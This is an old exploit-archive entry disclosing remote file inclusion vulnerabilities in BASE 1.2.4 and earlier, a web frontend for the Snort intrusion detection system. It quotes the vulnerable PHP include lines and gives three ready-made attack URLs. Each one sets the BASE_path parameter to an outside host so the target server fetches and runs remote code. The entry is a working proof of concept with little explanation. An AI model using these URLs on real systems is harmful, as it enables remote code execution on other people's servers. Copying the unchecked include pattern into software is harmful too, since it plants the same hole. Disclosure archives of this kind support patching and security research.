BASE <= 1.2.4 melissa (Snort Frontend) Remote Inclusion Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BASE <= 1.2.4 melissa (Snort Frontend) Remote Inclusion Vulnerabilities
# Published : 2006-05-25
# Author : str0ke
# Previous Title : WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit
# Next Title : open-medium.CMS <= 0.25 (404.php) Remote File Include Vulnerability

# Basic Analysis and Security Engine (BASE) <= 1.2.4 (melissa) Inclusion Vulnerabilities
#   Just glanced over BASE for a pentesting job. /str0ke ! milw0rm.com
##################################

[code (base_qry_common.php)]
   include_once("$BASE_path/includes/base_signature.inc.php");
[/code]

http://[site]/snort/base_qry_common.php?BASE_path=http://www.milw0rm.com/index.php?&

########################################

[code (base_stat_common.php)]
   include_once("$BASE_path/includes/base_constants.inc.php");
[/code]

http://[site]/snort/base_stat_common.php?BASE_path=http://www.milw0rm.com/index.php?&

###############################################

[code (includes/base_include.inc.php)]
   include_once("$BASE_path/includes/base_db.inc.php");
   include_once("$BASE_path/includes/base_output_html.inc.php");
   include_once("$BASE_path/includes/base_state_common.inc.php");
   ...
[/code]

http://[site]/snort/includes/base_include.inc.php?BASE_path=http://www.milw0rm.com/index.php?&

#######################################################

# www.Syue.com [2006-05-25]